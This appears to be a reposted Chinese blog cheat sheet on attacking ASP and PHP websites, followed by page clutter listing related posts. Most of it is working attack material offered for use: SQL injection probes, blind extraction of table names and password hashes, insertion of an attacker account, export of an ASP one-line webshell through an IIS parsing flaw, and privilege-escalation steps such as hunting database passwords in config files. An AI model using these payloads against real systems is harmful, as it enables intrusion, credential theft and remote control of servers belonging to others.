渗透笔记之脚本入侵(ASP,PHP)<转>

最新推荐文章于 2022-03-29 21:34:54 发布
最新推荐文章于 2022-03-29 21:34:54 发布
阅读量192 收藏
点赞数
原文链接:http://www.cnblogs.com/demonspider/archive/2013/04/11/3015170.html
版权

简单判定有无漏洞:          粗略型:

  • '

复制代码
            1. 数字型:

  • and 1=1 and 1=2

复制代码
             2.字符型:

  • ' and '1'='1 ' and '1'='2

复制代码
             3.搜索型:

  • %' and 1=1 and '%'='% 或者 %' and 1=2 and '%'='%

复制代码
     (PS:第三个大家可能不常用,他一般在ASP脚本中一般写成:keyword=request(”keyword”),赋值“KYO”到SQL语句中的时候即变为Select * from 表名 where keyword like ‘%KYO%’)
简单判断数据库信息:
语句型(IIS报不报错,语句自己区分):            and user>0             and  (select count(*) from msysobjects)>0 ……(页面错误为access数据库)            and  (select count(*) from sysobjects)>0 ……(页面正常为MSSQL数据库)            and  db_name()>0 ……(爆数据库名)            version>0  (爆SQLServer版本信息以及服务器操作系统的类型和版本信息)      粗略型:加 ’(根据服务器报错的信息来判断)            加 ;--(;和--MSSQL数据库里面一般都有, ; 表示分离,-- 则是注释符ACCESS数据库里没有)
判断MYSQL权限:                     and 0<>(Select ISSRVROLEMEMBER(’sysadmin’))--(页面正常则为SA)                      and 0<>(Select IS_MEMBER(’db_owner’))--(页面正常则为db_owner)                      and 0<>(Select IS_MEMBER(’public’))--(页面正常则是public)
PS:以上方法适用于参数是int的时候,若为字符型,需在参数后添加’和查询语句后添加;--
开始进行SQL注入(ACCESS):
  猜解表名:                    and 0<>(select count(*) from 表名) 或and exists(Select * from 表名)                              and 1<(select count(*) from 表名) (页面错误说明帐号数目就是1个)          猜解字段:                    and exists(Select 字段名 from 表名)(页面正常存在,不正常不存在)          猜解用户名和密码长度:                   and(Select top 1 len(列名) from 表名)>N (TOP表示把最前面的一条记录提取出来;N为变换猜解的列长度,页面错误即说明该列长度为N)                                             如:and 1=(select count(*) from user where len(name)>6) 错误                     and 1=(select count(*) from user where len(name)>5) 正确                     则长度是6
             猜解用户名和密码:and (select top 1 asc(mid(列名,1,1)) from 表名)>0                                 如:and (select top 1 asc(mid(user,1,1)) from name)>96页面正常                          and (select top 1 asc(mid(user,1,1)) from name)>97页面错误                          则ASCLL码为97
  PS:因为MD5的密文只有16,18,32,40这几个,所以猜解密码的时候只要试一试15,16,17,18,31,32,39,40等就简单些。 开始进行SQL注入(MYSQL):
             爆出表名和字段: having 1=1--                                  插入新记录: group by users.ID having 1=1-- group by users.ID, users.username, users.password, users.privs having 1=1-- ; insert into users values( 666, attacker, foobar, 0xffff )--                                   猜解表名:and (select top 1 name from sysobjects where xtype='u')>0 (获得第一个表名)                                  and (select top 1 name from sysobjects where xtype='u' and name not in ('user'))>0(获得第二个表名)                                       ………………                       猜解列名:and (select top 1 col_name(object_id('字段'),1) from sysobjects)>0(得到字段的第一个列名)                       猜解字段内容:and (select top 1 列名 from [表名])>0                                                         如:and (select top 1 username from [admin])>0 (获取用户名)                                          and (select top 1 password from [admin])>0 (获取密码)
导出webshell:
        1.利用SQL执行命令功能导出WebShell:                                                     SELECT '<%execute request("a")%>' into [vote] in 'd:\web\x.asp;.xls' 'excel 8.0;' from vote PS:需提供SQL执行功能且知道绝对路径方可使用(vote为已知表段)                               2.建立一个有一个A字段的表 表名为a 字段类型为字符 长度为50,在表A的a字段插入密码为90sec的一句话木马,把表a的内容导出为物理路径的一个EXCEL文件,导出为EXCEL后在利用IIS解析漏洞就可以变成小马了。 语句:

  • create table cmd (a varchar(50))
  • insert into cmd (a) values ('<%execute request("90sec")%>')
  • select * into [a] in 'f:\host\qhdyxt\web\a.asp;.xls' 'excel 4.0;' from cmd
  • drop table cmd

复制代码
提权:
1.system权限下直接添加账号(可能的话):直接CMD命令添加   2.使用shell自带的提权功能:Serv_U,pcAnywhere,Radmin密码读取等,全部试一试   3.利用系统的漏洞进行溢出提权:利用巴西烤肉提权,在CMD命令一行里输入C:\recycler\1.exe空格“CMD命令”,1.exe就是巴西烤肉咯   4.用软件的漏洞来提权(这个机会比较渺茫,个人没有成功过)   5.在conn.asp webconfig.asp等文件查找SA密码或者查找inc.php 等文件里面的ROOT密码(可以用CMD语句查找,如:利用CMD命令 dir /s d:\conn.asp 或者 dir /s d:\*inc*.php 来查找配置文件)

转载于:https://www.cnblogs.com/demonspider/archive/2013/04/11/3015170.html

weixin_30916125
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php网站渗透实战_PHP网站安全-漏洞渗透及解决方式—概述
weixin_39992417的博客
12-19 2351
针对PHP的网站主要存在下面几种攻击方式:1、命令注入(Command Injection)2、eval注入(Eval Injection)3、客户端脚本攻击(Script Insertion)4、跨网站脚本攻击(Cross Site Scripting, XSS)5、SQL注入攻击(SQL injection)6、跨网站请求伪造攻击(Cross Site Request Forgeries, C...
ASP+PHP 脚本漏洞自动入侵器 HDSI v2.2 最终版
05-20
ASP+PHP 脚本漏洞自动入侵器 HDSI v2.2 最终版<br/>友情提示:HDSI v2.2 最终版建站源码源程序由站长265http://www.zz265.com 收集整理.清除已知的木马程序,为防万一,下载后请使用自己的杀毒软件再扫描一次。 另外本站收集整理大量商业建站源码源程序,包含大量完整无错修正的商业版源码、官方正式版源码,如若侵犯到您的利益请来信告知,我们会在第一时间内处理。<br/>
写一个php脚本辅助渗透测试
aiquan9342的博客
03-22 132
因为一个注入要爬行一些数据,然后写的一个小脚本,能写脚本来辅助渗透,也算是里程碑。哈哈哈 <?php $num = 1; while ($num <= 39) { $web_url = "http://www.xxx.com/shownews.asp?id=626%0AUNION%0ASELECT%0Atop%0A1%0A1,user_username,3,u...
渗透笔记脚本入侵ASPPHP
问君能有几多愁,恰似一江春水向东流
05-13 855
简单判定有无漏洞: 粗略型:' 1. 数字型: and 1=1 and 1=2 2.字符型: ' and '1'='1 ' and '1'='2 3.搜索型: %' and 1=1 and '%'='% 或者 %' and 1=2 and '%'='% (PS:第三个大家可能不常用,他一般在ASP脚本中一般写成:keyword=request(”ke
php+mysql快速渗透
weixin_30908941的博客
05-02 173
1)如何快速寻找站点注入漏洞?2)PHP+MYSQL数据库下快速寻找WEB站点路径? 3)MYSQL LOAD FILE()下读取文件?3)MYSQL INTO OUTFILE下写入PHPSHELL? 简单介绍Mysql注入中用到的一些函数的作用,利用它们可以判断当前用户权限(Root为最高,相当于MSSQL中的SA)、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。1:...
PHP随手笔记整理之PHP脚本和JAVA连接mysql数据库
10-23
主要介绍了PHP随手笔记整理之PHP脚本和JAVA连接mysql数据库的相关资料,需要的朋友可以参考下
dwr3 学习笔记<一>
07-31
NULL 博文链接:https://lee20101029.iteye.com/blog/960569
渗透测试学习笔记之案例一.pdf
04-06
渗透测试学习笔记
PHP学习笔记之数组篇
12-18
一、如何定义数组:在PHP中创建数组主要有两种方式,...php 2 //用1,2,3的数值作为数组的键 3 echo ‘<p>数组$array1的键值为:</p>’; 4 $array1[1]=’a’; 5 $array1[2]=’b’; 6 $array1[3]=’c’; 7 print_r($
web渗透——PHP一句话插入
dongxie_tk的博客
10-20 5061
一句话:     //as是形式参数 位置: 1、模块——模块管理——文件管理器 2、模板——模板管理——标签源码管理 3、、、 进入,选择.PHP文件,插入一句话 使用: 1、在网页上,、、、/dede/ad_add.php?as=system('dir');    //可以显示该目录下的文件、文件大小以及字节数
渗透入侵\海洋顶端PHP注射工具.zip
07-15
海洋顶端PHP注射工具
php自查无后门靶场源码,渗透测试源码一套
03-22
php自查无后门靶场源码,渗透测试源码一套,喜欢的点个关注呗 接下来会慢慢上资源
渗透基础PHP(零散知识点)
qq_52331099的博客
03-29 3980
查询语句:从admin表中查询 select字段 from表名 where条件 and =>要求and 等式两边都成立才成立 or = > 要求or等式两边有一边成立才成立 SQL注入核心: 用户输入的数据被当做代码进行 万能密码 :' or 1 = 1 -- (这是注释的意思) #(警号注释只有mysql数据库专用) 最好的操作: -- qwe and 优先级 比 or 高 现在主流防护: 使用正则表达式 来 过滤 用户传输的数据 【这就是为什么注册密...
详述php渗透全过程(组图)
黑客攻防 | .net 源代码下载 | ASP.NET开发 | ORACLE数据库开发 | JAVASCRIPT脚本下载 | java源码下载
03-05 864
导读:   最近一直比较关注PHP注射的东西.学习好几天了.也应该实战一下了.目标http://app.xxxx.com .一个市场调查的门户.找注射点嘛,还是要用我们可爱的搜索引擎.为什么可爱呢?一会就知道了.Go Go Go !!!!!   在google中搜索php?id= site:xxx.com.意思就是说搜索XXX网站中以php?id=的URL.嘿.还真让我找到一个. http://app.xxx.com/cati/article_literature.php?id=11 .打开吓我一条
渗透————PHP+MYSQL数据库(上)
longger_lee
11-12 1003
SQL简单命令:         mysql -u username -ppassword -h ip   //进入MYSQL数据库         show database;  //查看数据库有哪些文件         select version();  //查看数据库版本         use admin;     //选择admin数据库         show table
4.1.9. 其它
bylfsj的博客
10-31 435
4.1.9. 其它¶ 4.1.9.1. 低精度¶ php中并不是用高精度来存储浮点数,而是用使用 IEEE 754 双精度格式,造成在涉及到浮点数比较的时候可能会出现预期之外的错误。 比如 php -r "var_dump(0.2+0.7==0.9);" 这行代码的输出是 bool(false) 而不是 bool(true)。这在一些情况下可能出现问题。 4.1.9.2. 弱类型¶ 如果使...
PHP基础学习【针对渗透
m0_55854679的博客
12-11 1261
PHP基础教程 PHP属于后端语言,后端的核心在于与数据库交互。 常见的后端语言:ASPASPX、PHP、JSP 什么是PHPPHP(超文本预处理器)是一种通用开源脚本语言,是动态语言的一种,动态语言还包括ASPASPX、JSP。 PHP语法吸收了C、java、Perl的特点,主要用于web开发领域。 PHP可以将程序嵌入到前端代码(HTML、CSS、JS)执行。 PHP支持几乎所有流行的数据库以及操作系统。 基本语法 PHP头部标记风格 <?php ?> <script
PHP漏洞利用和渗透基础入门[2]
落叶花雪的博客
06-25 330
登录注入实例 提示:了解Mysql和php可能更容易理解 构造Mysql语句时利用一些方法使某些不应该返回的数据返回或者执行某种不该执行的命令 这个过程就叫注入 那我们来举个例子: $sql='select * from users where userName='$userName' and password='$password'; 代码逻辑(建议阅读)来自: https://blog....
Android开发 compose组件 数据库查询返回 Flow<List<NoteContentEntity>> MutableState<List<NoteContentEntity>>
最新发布
05-12
fun convertFlowToList(flow: Flow<List<NoteContentEntity>>): MutableState<List<NoteContentEntity>> { val listState = mutableStateOf<List<NoteContentEntity>>(emptyList()) launch { flow.collect { ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值